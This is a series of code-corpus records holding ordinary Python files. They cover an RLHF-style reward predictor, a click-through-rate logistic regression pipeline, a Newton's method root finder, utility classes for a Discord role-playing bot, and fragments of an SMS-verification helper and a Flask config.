logger.info(\"发送短信失败\")\n logger.info(\"==========获取发送验证码 end=======\")\n return retcode\n\n except Exception as ex:\n logger.info(\"==========获取发送验证码 失败=======\")\n print(ex)\n print(\"获取发送验证码错误!\")\n\n\n","sub_path":"datadao/sendverify.py","file_name":"sendverify.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"405909763","text":"import logging\nimport os.path as osp\nimport time\n\nimport easy_tf_log\nimport numpy as np\nimport tensorflow as tf\nfrom numpy.testing import assert_equal\n\nfrom drlhp.pref_db import PrefDB\nfrom drlhp.reward_predictor_core_network import net_cnn\nfrom drlhp.drlhp_utils import LimitedRunningStat, RunningStat\nfrom utils import batch_iter\n\nMIN_L2_REG_COEF = 0.1\n\n\nclass RewardPredictor:\n\n def __init__(self, obs_shape, network, network_args, r_std, lr=1e-4, log_dir=None, seed=None):\n self.obs_shape = obs_shape\n graph = tf.Graph()\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=graph, config=config)\n\n with graph.as_default():\n if seed is not None:\n tf.set_random_seed(seed)\n self.l2_reg_coef = MIN_L2_REG_COEF\n self.rps = [RewardPredictorNetwork(core_network=network,\n network_args=network_args,\n obs_shape=obs_shape,\n lr=lr)]\n self.init_op = tf.global_variables_initializer()\n # Why save_relative_paths=True?\n # So that the plain-text 'checkpoint' file written uses relative paths,\n # which seems to be needed in order to avoid confusing saver.restore()\n # when restoring from FloydHub runs.\n self.saver = tf.train.Saver(max_to_keep=2, save_relative_paths=True)\n self.summaries = self.add_summary_ops()\n\n self.train_writer = tf.summary.FileWriter(\n osp.join(log_dir, 'reward_predictor', 'train'), flush_secs=5)\n self.test_writer = tf.summary.FileWriter(\n osp.join(log_dir, 'reward_predictor', 'test'), flush_secs=5)\n\n self.n_steps = 0\n self.r_norm_limited = LimitedRunningStat()\n self.r_norm = RunningStat(shape=[])\n self.r_std = r_std\n\n self.logger = easy_tf_log.Logger()\n self.logger.set_log_dir(osp.join(log_dir, 'reward_predictor', 'misc'))\n self.reward_call_n = 0\n\n self.log_interval = 20\n\n self.init_network()\n\n\n def add_summary_ops(self):\n summary_ops = []\n\n for pred_n, rp in enumerate(self.rps):\n name = 'reward_predictor/accuracy_{}'.format(pred_n)\n op = tf.summary.scalar(name, rp.accuracy)\n summary_ops.append(op)\n name = 'reward_predictor/loss_{}'.format(pred_n)\n op = tf.summary.scalar(name, rp.loss)\n summary_ops.append(op)\n l2_reg_losses = [rp.l2_reg_loss for rp in self.rps]\n mean_reg_loss = tf.reduce_mean(l2_reg_losses)\n op = tf.summary.scalar('reward_predictor/l2_loss_mean', mean_reg_loss)\n summary_ops.append(op)\n\n summaries = tf.summary.merge(summary_ops)\n\n return summaries\n\n def init_network(self, load_ckpt_dir=None):\n if load_ckpt_dir:\n ckpt_file = tf.train.latest_checkpoint(load_ckpt_dir)\n if ckpt_file is None:\n msg = \"No reward predictor checkpoint found in '{}'\".format(\n load_ckpt_dir)\n raise FileNotFoundError(msg)\n self.saver.restore(self.sess, ckpt_file)\n print(\"Loaded reward predictor checkpoint from '{}'\".format(ckpt_file))\n else:\n self.sess.run(self.init_op)\n\n def save(self, path):\n ckpt_name = self.saver.save(self.sess, path)\n print(\"Saved reward predictor checkpoint to '{}'\".format(ckpt_name))\n\n def load(self, path):\n self.saver.restore(self.sess, path)\n print(\"Restored reward predictor from checkpoint '{}'\".format(path))\n\n def raw_rewards(self, obs):\n \"\"\"\n Return (unnormalized) reward for each frame of a single segment\n from each member of the ensemble.\n \"\"\"\n assert_equal(obs.shape[1:], self.obs_shape)\n n_steps = obs.shape[0]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.training] = False\n feed_dict[rp.s1] = [obs]\n # This will return nested lists of sizes n_preds x 1 x nsteps\n # (x 1 because of the batch size of 1)\n rs = self.sess.run([rp.r1 for rp in self.rps], feed_dict)\n rs = np.array(rs)\n # Get rid of the extra x 1 dimension\n rs = rs[:, 0, :]\n n_preds = 1\n assert_equal(rs.shape, (n_preds, n_steps))\n return rs\n\n def reward(self, obs):\n \"\"\"\n Return (normalized) reward for each frame of a single segment.\n\n (Normalization involves normalizing the rewards from each member of the\n ensemble separately, then averaging the resulting rewards across all\n ensemble members.)\n \"\"\"\n assert_equal(obs.shape[1:], self.obs_shape)\n n_steps = obs.shape[0]\n\n # Get unnormalized rewards\n\n ensemble_rs = self.raw_rewards(obs)\n logging.debug(\"Unnormalized rewards:\\n%s\", ensemble_rs)\n\n # Normalize rewards\n\n # Note that we implement this here instead of in the network itself\n # because:\n # * It's simpler not to do it in TensorFlow\n # * Preference prediction doesn't need normalized rewards. Only\n # rewards sent to the the RL algorithm need to be normalized.\n # So we can save on computation.\n\n # Page 4:\n # \"We normalized the rewards produced by r^ to have zero mean and\n # constant standard deviation.\"\n # Page 15: (Atari)\n # \"Since the reward predictor is ultimately used to compare two sums\n # over timesteps, its scale is arbitrary, and we normalize it to have\n # a standard deviation of 0.05\"\n # Page 5:\n # \"The estimate r^ is defined by independently normalizing each of\n # these predictors...\"\n\n # We want to keep track of running mean/stddev for each member of the\n # ensemble separately, so we have to be a little careful here.\n n_preds = 1\n assert_equal(ensemble_rs.shape, (n_preds, n_steps))\n ensemble_rs = ensemble_rs.transpose()\n assert_equal(ensemble_rs.shape, (n_steps, n_preds))\n for ensemble_rs_step in ensemble_rs:\n self.r_norm_limited.push(ensemble_rs_step[0])\n self.r_norm.push(ensemble_rs_step[0])\n ensemble_rs -= self.r_norm.mean\n ensemble_rs /= (self.r_norm.std + 1e-12)\n ensemble_rs *= self.r_std\n ensemble_rs = ensemble_rs.transpose()\n assert_equal(ensemble_rs.shape, (n_preds, n_steps))\n\n self.reward_call_n += 1\n if self.reward_call_n % 1000 == 0:\n self.logger.logkv('reward_predictor/r_norm_mean_recent', self.r_norm_limited.mean)\n self.logger.logkv('reward_predictor/r_norm_std_recent', self.r_norm_limited.std)\n self.logger.logkv('reward_predictor/r_norm_mean', self.r_norm.mean)\n self.logger.logkv('reward_predictor/r_norm_std', self.r_norm.std)\n\n # \"...and then averaging the results.\"\n rs = np.mean(ensemble_rs, axis=0)\n assert_equal(rs.shape, (n_steps,))\n logging.debug(\"After ensemble averaging:\\n%s\", rs)\n\n return rs\n\n def train(self, prefs_train: PrefDB, prefs_val: PrefDB, val_interval, verbose=True):\n \"\"\"\n Train all ensemble members for one epoch.\n \"\"\"\n\n if verbose:\n print(\"Training/testing with %d/%d preferences\" % (len(prefs_train), len(prefs_val)))\n\n start_steps = self.n_steps\n start_time = time.time()\n\n train_losses = []\n val_losses = []\n for _, batch in enumerate(batch_iter(prefs_train.prefs, batch_size=32, shuffle=True)):\n train_losses.append(self.train_step(batch, prefs_train))\n self.n_steps += 1\n\n if self.n_steps and self.n_steps % val_interval == 0 and len(prefs_val) != 0:\n val_losses.append(self.val_step(prefs_val))\n\n if val_losses:\n train_loss = np.mean(train_losses)\n val_loss = np.mean(val_losses)\n ratio = val_loss / train_loss\n self.logger.logkv('reward_predictor/test_train_loss_ratio', ratio)\n if ratio > 1.3:\n self.l2_reg_coef *= 1.5\n elif ratio < 1.3:\n self.l2_reg_coef = max(self.l2_reg_coef / 1.5, MIN_L2_REG_COEF)\n self.logger.logkv('reward_predictor/reg_coef', self.l2_reg_coef)\n\n end_time = time.time()\n end_steps = self.n_steps\n rate = (end_steps - start_steps) / (end_time - start_time)\n self.logger.logkv('reward_predictor/training_steps_per_second', rate)\n if verbose:\n print(\"Done training DRLHP!\")\n\n def train_step(self, batch, prefs_train):\n s1s = [prefs_train.segments[k1] for k1, k2, pref, in batch]\n s2s = [prefs_train.segments[k2] for k1, k2, pref, in batch]\n prefs = [pref for k1, k2, pref, in batch]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.s1] = s1s\n feed_dict[rp.s2] = s2s\n feed_dict[rp.pref] = prefs\n feed_dict[rp.training] = True\n # Why do we only check the loss from the first reward predictor?\n # As a quick hack to get adaptive L2 regularization working quickly,\n # assuming we're only using one reward predictor.\n ops = [self.rps[0].loss, self.summaries, [rp.train for rp in self.rps]]\n loss, summaries, _ = self.sess.run(ops, feed_dict)\n if self.n_steps % self.log_interval == 0:\n self.train_writer.add_summary(summaries, self.n_steps)\n return loss\n\n def val_step(self, prefs_val):\n val_batch_size = 32\n if len(prefs_val.prefs) <= val_batch_size:\n batch = prefs_val.prefs\n else:\n idxs = np.random.choice(len(prefs_val.prefs), val_batch_size, replace=False)\n batch = [prefs_val.prefs[i] for i in idxs]\n s1s = [prefs_val.segments[k1] for k1, k2, pref, in batch]\n s2s = [prefs_val.segments[k2] for k1, k2, pref, in batch]\n prefs = [pref for k1, k2, pref, in batch]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.s1] = s1s\n feed_dict[rp.s2] = s2s\n feed_dict[rp.pref] = prefs\n feed_dict[rp.training] = False\n loss, summaries = self.sess.run([self.rps[0].loss, self.summaries], feed_dict)\n if self.n_steps % self.log_interval == 0:\n self.test_writer.add_summary(summaries, self.n_steps)\n return loss\n\n def reset_normalisation(self):\n self.r_norm_limited = LimitedRunningStat()\n self.r_norm = RunningStat(shape=1)\n\n def get_feed_dict(self):\n feed_dict = {}\n for rp in self.rps:\n feed_dict[rp.l2_reg_coef] = self.l2_reg_coef\n return feed_dict\n\n\nclass RewardPredictorNetwork:\n \"\"\"\n Predict the reward that a human would assign to each frame of\n the input trajectory, trained using the human's preferences between\n pairs of trajectories.\n\n Network inputs:\n - s1/s2 Trajectory pairs\n - pref Preferences between each pair of trajectories\n Network outputs:\n - r1/r2 Reward predicted for each frame\n - rs1/rs2 Reward summed over all frames for each trajectory\n - pred Predicted preference\n \"\"\"\n\n def __init__(self, core_network, network_args, obs_shape, lr):\n training = tf.placeholder(tf.bool)\n obs_shape = tuple(obs_shape)\n # Each element of the batch is one trajectory segment.\n # (Dimensions are n segments x n frames per segment x ...)\n s1 = tf.placeholder(tf.float32, shape=(None, None) + obs_shape)\n s2 = tf.placeholder(tf.float32, shape=(None, None) + obs_shape)\n # For each trajectory segment, there is one human judgement.\n pref = tf.placeholder(tf.float32, shape=(None, 2))\n\n # Concatenate trajectory segments so that the first dimension is just\n # frames\n # (necessary because of conv layer's requirements on input shape)\n s1_unrolled = tf.reshape(s1, (-1,) + obs_shape)\n s2_unrolled = tf.reshape(s2, (-1,) + obs_shape)\n\n l2_reg_coef = tf.placeholder(tf.float32)\n l2_reg = tf.contrib.layers.l2_regularizer(scale=l2_reg_coef)\n # Predict rewards for each frame in the unrolled batch\n _r1 = core_network(s=s1_unrolled, reuse=False, training=training, regularizer=l2_reg,\n **network_args)\n _r2 = core_network(s=s2_unrolled, reuse=True, training=training, regularizer=l2_reg,\n **network_args)\n\n # Shape should be 'unrolled batch size'\n # where 'unrolled batch size' is 'batch size' x 'n frames per segment'\n c1 = tf.assert_rank(_r1, 1)\n c2 = tf.assert_rank(_r2, 1)\n with tf.control_dependencies([c1, c2]):\n # Re-roll to 'batch size' x 'n frames per segment'\n __r1 = tf.reshape(_r1, tf.shape(s1)[0:2])\n __r2 = tf.reshape(_r2, tf.shape(s2)[0:2])\n # Shape should be 'batch size' x 'n frames per segment'\n c1 = tf.assert_rank(__r1, 2)\n c2 = tf.assert_rank(__r2, 2)\n with tf.control_dependencies([c1, c2]):\n r1 = __r1\n r2 = __r2\n\n # Sum rewards over all frames in each segment\n _rs1 = tf.reduce_sum(r1, axis=1)\n _rs2 = tf.reduce_sum(r2, axis=1)\n # Shape should be 'batch size'\n c1 = tf.assert_rank(_rs1, 1)\n c2 = tf.assert_rank(_rs2, 1)\n with tf.control_dependencies([c1, c2]):\n rs1 = _rs1\n rs2 = _rs2\n\n # Predict preferences for each segment\n _rs = tf.stack([rs1, rs2], axis=1)\n # Shape should be 'batch size' x 2\n c1 = tf.assert_rank(_rs, 2)\n with tf.control_dependencies([c1]):\n rs = _rs\n _pred = tf.nn.softmax(rs)\n # Shape should be 'batch_size' x 2\n c1 = tf.assert_rank(_pred, 2)\n with tf.control_dependencies([c1]):\n pred = _pred\n\n preds_correct = tf.equal(tf.argmax(pref, 1), tf.argmax(pred, 1))\n accuracy = tf.reduce_mean(tf.cast(preds_correct, tf.float32))\n\n _loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=pref,\n logits=rs)\n # Shape should be 'batch size'\n c1 = tf.assert_rank(_loss, 1)\n with tf.control_dependencies([c1]):\n loss = tf.reduce_sum(_loss)\n\n l2_reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n # l2_reg_losses is a list of L2 norms - one for each weight layer\n # (where each L2 norm is just a scalar - so this is a list of scalars)\n # Why do we use add_n rather than reduce_sum?\n # reduce_sum is for when you have e.g. a matrix and you want to sum over one row.\n # If you want to sum over elements of a list, you use add_n.\n l2_reg_loss = tf.add_n(l2_reg_losses)\n loss += l2_reg_loss\n\n if core_network == net_cnn:\n batchnorm_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer_dependencies = batchnorm_update_ops\n else:\n optimizer_dependencies = []\n\n with tf.control_dependencies(optimizer_dependencies):\n train = tf.train.AdamOptimizer(learning_rate=lr).minimize(loss)\n\n # Inputs\n self.training = training\n self.s1 = s1\n self.s2 = s2\n self.pref = pref\n self.l2_reg_coef = l2_reg_coef\n\n # Outputs\n self.r1 = r1\n self.r2 = r2\n self.rs1 = rs1\n self.rs2 = rs2\n self.pred = pred\n\n self.accuracy = accuracy\n self.loss = loss\n self.train = train\n self.l2_reg_loss = l2_reg_loss\n","sub_path":"drlhp/reward_predictor.py","file_name":"reward_predictor.py","file_ext":"py","file_size_in_byte":15847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614839678","text":"import pandas as pd\nimport numpy as np\n\nimport pickle\n\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import metrics\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\n# Train Valid\ntrain = pd.read_csv('train.csv',encoding='cp932')\nid_date_max = train[['delivery_id','user_id','date']].groupby('user_id').max()['delivery_id']\nTrain = train.set_index('delivery_id').drop(id_date_max,axis=0)\nValid = train.set_index('delivery_id').loc[id_date_max]\n# Test\nTest = pd.read_csv('test.csv',encoding='cp932')\n\ndef get_data(df):\n df_ = df.drop(['date', 'user_id'],axis=1)\n\n gender_dummis = pd.get_dummies(df_['gender'],prefix='gender',drop_first=True)\n age_dummies = pd.get_dummies(df_['age'],prefix='gender')\n #age_dummies = df_['age'].replace({'20代':2,'40代':4,'30代':3,'20歳未満':1,'50代以上':5})\n pre_dummies = pd.get_dummies(df_['prefectures'],prefix='prec')\n \n df_2 = df_.drop(['gender', 'age', 'prefectures'],axis=1)\n df_2['gender'] = gender_dummis\n #df_2['age'] = age_dummies\n df_2 = pd.concat([df_2,age_dummies],axis=1)\n df_2 = pd.concat([df_2,pre_dummies],axis=1)\n \n ratio_total = (df_2['prev_total_click']/df_2['prev_total_cnt']).replace(0,-1).fillna(0)\n ratio_eco = (df_2['prev_economy_click']/df_2['prev_economy_cnt']).replace(0,-1).fillna(0)\n ratio_pol = (df_2['prev_politics_click']/df_2['prev_politics_cnt']).replace(0,-1).fillna(0)\n ratio_soc = (df_2['prev_society_click']/df_2['prev_society_cnt']).replace(0,-1).fillna(0)\n ratio_spo = (df_2['prev_sport_click']/df_2['prev_sport_cnt']).replace(0,-1).fillna(0)\n ratio_ent = (df_2['prev_entertainment_click']/df_2['prev_entertainment_cnt']).replace(0,-1).fillna(0)\n \n df_2['ratio_total'] = ratio_total\n df_2['ratio_eco'] = ratio_eco\n df_2['ratio_pol'] = ratio_pol\n df_2['ratio_soc'] = ratio_soc\n df_2['ratio_spo'] = ratio_spo\n df_2['ratio_ent'] = ratio_ent\n return df_2\ndef delete_type(df,col):\n df_ = df[(df['type']=='%s'%col)]\n return df_.drop('type',axis=1)\ndef under_sample(df):\n df0 = df[(df['click_flg']==0)]\n df1 = df[(df['click_flg']==1)]\n df0_ = df0.sample(len(df1))\n return pd.concat([df0_,df1])##アンダーサンプルしていない\n\n\nTrain2 = get_data(Train)\nValid2 = get_data(Valid)\n#Train 最終データセット\ntr_eco = delete_type(Train2,col='経済')\ntr_ent = delete_type(Train2,col='エンタメ')\ntr_spo = delete_type(Train2,col='スポーツ')\ntr_pol = delete_type(Train2,col='政治')\ntr_soc = delete_type(Train2,col='社会')\n\ntr_eco_u = under_sample(tr_eco)\ntr_ent_u = under_sample(tr_ent)\ntr_spo_u = under_sample(tr_spo)\ntr_pol_u = under_sample(tr_pol)\ntr_soc_u = under_sample(tr_soc)\n\n\n#Valid 最終データセット\nva_eco = delete_type(Valid2,col='経済')\nva_ent = delete_type(Valid2,col='エンタメ')\nva_spo = delete_type(Valid2,col='スポーツ')\nva_pol = delete_type(Valid2,col='政治')\nva_soc = delete_type(Valid2,col='社会')\n\nva_eco_u = under_sample(va_eco)\nva_ent_u = under_sample(va_ent)\nva_spo_u = under_sample(va_spo)\nva_pol_u = under_sample(va_pol)\nva_soc_u = under_sample(va_soc)\n\n\n#各typeごとの学習\ncols = ['eco','ent','spo','pol','soc']\nTrains = [tr_eco_u, tr_ent_u, tr_spo_u, tr_pol_u, tr_soc_u]\nVals = [va_eco_u, va_ent_u, va_spo_u, va_pol_u, va_soc_u]\n\n\nparam_grid = {\n 'penalty' : ['l2', 'l1','elasticnet'],\n 'C':[0.01,0.1,1,10,50,100],\n 'solver':['saga'],\n 'l1_ratio':[0.5]\n }\n\nparam_dicts = list(ParameterGrid(param_grid))\nfor (i,(col,tr,va)) in enumerate(zip(cols,Trains,Vals)):\n #train\n y_tr = tr['click_flg'].values\n x_tr = tr.drop('click_flg',axis=1).values\n #val\n y_va = va['click_flg'].values\n x_va = va.drop('click_flg',axis=1).values\n \n #標準化\n ss = StandardScaler()\n ss.fit(x_tr)\n fn_ss = 'ss_%s.sav'%col\n pickle.dump(ss, open(fn_ss, 'wb'))\n \n x_tr_nor = ss.transform(x_tr)#train\n x_va_nor = ss.transform(x_va)#val\n \n #学習\n best_score = 0\n \n for params in param_dicts:\n model = LogisticRegression(**params)\n model.fit(x_tr_nor,y_tr)\n score_tmp = model.score(x_va_nor,y_va)\n if score_tmp > best_score:\n best_params = params\n \n \n \n model = LogisticRegression(**best_params)\n model.fit(x_tr_nor,y_tr)\n pred = model.predict(x_va_nor)\n fn_model = 'model_%s.sav'%col\n pickle.dump(model, open(fn_model, 'wb'))\n \n score = model.score(x_va_nor,y_va)\n \n fpr, tpr, thresholds = metrics.roc_curve(y_va, pred)\n auc = metrics.auc(fpr, tpr)\n \n Score = pd.DataFrame({'type':[col],'score':[auc]})\n if i == 0:\n Scores = Score\n else:\n Scores = pd.concat([Scores,Score])\n\n\n#標準化 関数\nloaded_ss_eco = pickle.load(open('ss_eco.sav', 'rb'))\nloaded_ss_ent = pickle.load(open('ss_ent.sav', 'rb'))\nloaded_ss_spo = pickle.load(open('ss_spo.sav', 'rb'))\nloaded_ss_pol = pickle.load(open('ss_pol.sav', 'rb'))\nloaded_ss_soc = pickle.load(open('ss_soc.sav', 'rb'))\n\n#学習モデル\nloaded_model_eco = pickle.load(open('model_eco.sav', 'rb'))\nloaded_model_ent = pickle.load(open('model_ent.sav', 'rb'))\nloaded_model_spo = pickle.load(open('model_spo.sav', 'rb'))\nloaded_model_pol = pickle.load(open('model_pol.sav', 'rb'))\nloaded_model_soc = pickle.load(open('model_soc.sav', 'rb'))\n\n\n#テスト予測\nTest2 = get_data(Test)\n\ntest_eco_nor = loaded_ss_eco.transform(Test2.values)\ntest_ent_nor = loaded_ss_ent.transform(Test2.values)\ntest_spo_nor = loaded_ss_spo.transform(Test2.values)\ntest_pol_nor = loaded_ss_pol.transform(Test2.values)\ntest_soc_nor = loaded_ss_soc.transform(Test2.values)\n\nproba_eco = loaded_model_eco.predict_proba(test_eco_nor)[:,1]\nproba_ent = loaded_model_ent.predict_proba(test_ent_nor)[:,1]\nproba_spo = loaded_model_spo.predict_proba(test_spo_nor)[:,1]\nproba_pol = loaded_model_pol.predict_proba(test_pol_nor)[:,1]\nproba_soc = loaded_model_soc.predict_proba(test_soc_nor)[:,1]\n\ndf_probs = pd.DataFrame({'経済':proba_eco,'エンタメ':proba_ent,'スポーツ':proba_spo,'政治':proba_pol,'社会':proba_soc})\n\n\nPros = []\nTypes = []\nfor idx in df_probs.index:\n pros = df_probs.loc[idx]\n max_val = pros.max()\n pros = df_probs.loc[idx]\n Pros.append(max_val)\n types = pros[(pros==max_val)].index[0]\n Types.append(types)\n\n# submit\nsubmit = Test[['date','user_id']]\nsubmit['type'] = Types\nsubmit['probability'] = Pros\nsubmit.to_csv('answer_test_ver01.tsv', sep = '\\t', index=False, encoding='utf-8')","sub_path":"CTR_prediction.py","file_name":"CTR_prediction.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470448871","text":"import pandas as pd\nimport math as m\nimport sympy as s\n\n(p0 , TOL , N) = (-0.5 , 0.00001 , 30)\n\ndata = []\npd.options.display.float_format = \"{:,.7f}\".format\ndef f(x):\n return m.cos(m.pi * (x + 1) / 8) + 0.148 * x - 0.9062\n\ndef f_der(x0):\n x = s.Symbol('x')\n y = s.cos(s.pi * (x + 1) / 8) + 0.148 * x - 0.9062\n return float(s.diff(y , x).subs(x , x0))\n\n\ndef newtons(p0 , TOL , N):\n i = 1\n \n data.append([0 , p0, 10])\n\n while i <= N:\n p = p0 - (f(p0) / f_der(p0))\n\n data.append([i , p , abs(p - p0)])\n\n if(abs(p - p0) < TOL):\n print(\"solution is \" , round(p , 10) , \"after\" , i , \"iterations\")\n break\n\n i += 1\n\n p0 = p\n \n table = pd.DataFrame(data , columns = ['n' , 'pn' , 'relative error'])\n print(table.to_string(index = 0))\n\n if(i - 1 == N):\n print(\"Method failed after {} iterations\".format(N)) \n\n\nnewtons(p0 , TOL , N)","sub_path":"Single_variable/Newtons_method.py","file_name":"Newtons_method.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92221077","text":"from cogs.database import Database\n\nclass Ordenacao:\n\n @staticmethod\n def ordenacao_emboscada(party, horda, emboscador):\n ordem1 = []\n ordem2 = []\n quant1 = []\n quant2 = []\n for personagem in party:\n personagem_id = Database.personagem_id(personagem)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem1.append(personagem)\n quant1.append(agilidade)\n Ordenacao.insertion_sort(quant1, ordem1)\n for tipo, char in horda:\n if tipo == \"s\":\n shadow_id = Database.shadow_persona_id(char)\n atributos = Database.atributos_iniciais(shadow_id)\n agilidade = atributos[5]\n ordem2.append(char)\n quant2.append(agilidade)\n else:\n personagem_id = Database.personagem_id(char)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem2.append(personagem_id)\n quant2.append(agilidade)\n Ordenacao.insertion_sort(quant2, ordem2)\n if emboscador == \"party\":\n return ordem1 + ordem2\n else:\n return ordem2 + ordem1\n\n @staticmethod\n def ordenacao_disputa(party, horda):\n ordem = []\n quant = []\n for personagem in party:\n personagem_id = Database.personagem_id(personagem)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem.append(personagem)\n quant.append(agilidade)\n for tipo, char in horda:\n if tipo == \"s\":\n shadow_id = Database.shadow_persona_id(char)\n atributos = Database.atributos_iniciais(shadow_id)\n agilidade = atributos[5]\n else:\n personagem_id = Database.personagem_id(char)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem.append(personagem_id)\n quant.append(agilidade)\n Ordenacao.insertion_sort(quant, ordem)\n return ordem\n\n @staticmethod\n def insertion_sort(arr, ordem):\n for i in range(1, len(arr)):\n key = arr[i]\n key2 = ordem[i]\n j = i-1\n while j >=0 and key < arr[j]:\n arr[j+1] = arr[j]\n ordem[j+1] = ordem[j]\n j -= 1\n arr[j+1] = key\n ordem[j+1] = key2\n\nclass Somatorio:\n\n @staticmethod\n def atributos_totais_personagem(personagem_id, atributos):\n atributos_soma = Database.atributos_total(\"soma\", personagem_id)\n atributos_porcent = Database.atributos_total(\"porcent\", personagem_id)\n for i in range(len(atributos)):\n a = atributos[i] + atributos_soma[i]\n p = (atributos_porcent[i]/100) * a\n if atributos_soma[i] > 0:\n atributos[i] += int(a+p)\n else:\n atributos[i] += int(p)\n return atributos\n\nclass Reparador:\n\n @staticmethod\n def valores_atributos(atributos):\n for i in range(len(atributos)):\n atributos[i] = atributos[i][1]\n return atributos\n\n @staticmethod\n def repara_lista(lista, indice):\n nova_lista = []\n for i in range(len(lista)):\n nova_lista.append(lista[i][indice])\n return nova_lista\n\n @staticmethod\n def repara_nome(texto):\n nome = \"\"\n for palavra in texto:\n nome += palavra + \" \"\n nome = nome[:-1]\n return nome\n\nclass Gerador:\n\n @staticmethod\n def gerador_campos(chaves, valores):\n campos = []\n for i in range(len(valores)):\n campo = (chaves[i], valores[i])\n campos.append(campo)\n return campos\n\n @staticmethod\n def gerador_texto(lista_item):\n texto = \"\"\n for elem, quant in lista_item:\n texto += f'{elem} x{quant}; '\n texto = texto[:-2]\n return texto\n\n @staticmethod\n def gerador_campos_fraquezas(ficha, tipo):\n campos_fraquezas = [\n (\"<:phys:790320130810839101>\", ficha[tipo][0][1]),\n (\"<:gun:790320131028287488>\", ficha[tipo][1][1]),\n (\"<:fire:790320130483421245>\", ficha[tipo][2][1]),\n (\"<:ice:790320130738356224>\", ficha[tipo][3][1]),\n (\"<:elec:790320130151809047>\", ficha[tipo][4][1]),\n (\"<:wind:790320130521169922>\", ficha[tipo][5][1]),\n (\"<:psy:790320130772566046>\", ficha[tipo][6][1]),\n (\"<:nuclear:790320130584084532>\", ficha[tipo][7][1]),\n (\"<:bless:790320130746744892>\", ficha[tipo][8][1]),\n (\"<:curse:790320130387214336>\", ficha[tipo][9][1]),\n (\"<:almighty:790320130297954374>\", ficha[tipo][10][1])\n ]\n return campos_fraquezas\n\n @staticmethod\n def gerador_campos_atributos(fool, atributos):\n campos = []\n if fool:\n campos = [\n (\"**St**\", f'+{atributos[2]}'),\n (\"**Ma**\", f'+{atributos[3]}'),\n (\"**En**\", f'+{atributos[4]}'),\n (\"**Ag**\", f'+{atributos[5]}'),\n (\"**Lu**\", f'+{atributos[6]}')\n ]\n else:\n campos = [\n (\"**HP**\", f'+{atributos[0]}'),\n (\"**SP**\", f'+{atributos[1]}'),\n (\"**St**\", f'+{atributos[2]}'),\n (\"**Ma**\", f'+{atributos[3]}'),\n (\"**En**\", f'+{atributos[4]}'),\n (\"**Ag**\", f'+{atributos[5]}'),\n (\"**Lu**\", f'+{atributos[6]}')\n ]\n return campos\n\nclass Mensageiro:\n\n @staticmethod\n def informacoes_personagem(nome):\n informacoes = {}\n personagem_id = Database.personagem_id(nome)\n persona_id = Database.persona_equipada(personagem_id)\n usuario = Database.discord_user(personagem_id)\n equips = Database.itens_equipados(personagem_id)\n meelee = equips[0]\n ranged = equips[1]\n armadura = equips[2]\n fraquezas = Database.fraquezas(persona_id)\n atributos = Database.atributos(personagem_id, persona_id)\n atributos_base = Reparador.valores_atributos(atributos)\n atributos_somados = Somatorio.atributos_totais_personagem(personagem_id, atributos_base)\n skills = Database.skills_id(personagem_id, persona_id)\n informacoes[\"usuario\"] = usuario\n informacoes[\"meelee\"] = meelee\n informacoes[\"ranged\"] = ranged\n informacoes[\"armadura\"] = armadura\n informacoes[\"fraquezas\"] = fraquezas\n informacoes[\"atributos\"] = atributos_somados\n informacoes[\"skills\"] = skills\n return informacoes\n\n @staticmethod\n def informacoes_shadow(nome):\n informacoes = {}\n shadow_id = Database.shadow_persona_id(nome)\n fraquezas = Database.fraquezas(shadow_id)\n atributos_base = Database.atributos_iniciais(shadow_id)\n atributos_somados = Reparador.valores_atributos(atributos_base)\n nivel = Database.nivel_persona(shadow_id)\n skills = Database.skills_shadow(shadow_id, nivel)\n informacoes[\"fraquezas\"] = fraquezas\n informacoes[\"skills\"] = skills\n informacoes[\"atributos\"] = atributos_somados\n return informacoes\n\n @staticmethod\n def info_armadura(armadura):\n valor_armadura = 0\n if armadura != None:\n valor_armadura = Database.valor_item(armadura)\n return valor_armadura\n\n @staticmethod\n def info_ranged(ranged):\n valor_arma = 0\n if ranged != None:\n valor_arma = Database.valor_item(ranged)\n return valor_arma\n\n @staticmethod\n def info_meelee(meelee):\n valor_arma = 0\n if meelee != None:\n valor_arma = Database.valor_item(meelee)\n return valor_arma","sub_path":"painel de controle/bot/cogs/utilitarios.py","file_name":"utilitarios.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"516369196","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'question_app', 'question_app.db')\n\nWTF_CSRF_ENABLED = True\nSECRET_KEY = 'some mega-secret key'\n\nRECAPTCHA_PUBLIC_KEY = 'some non-secret public key'\nRECAPTCHA_PRIVATE_KEY = 'no one will know this 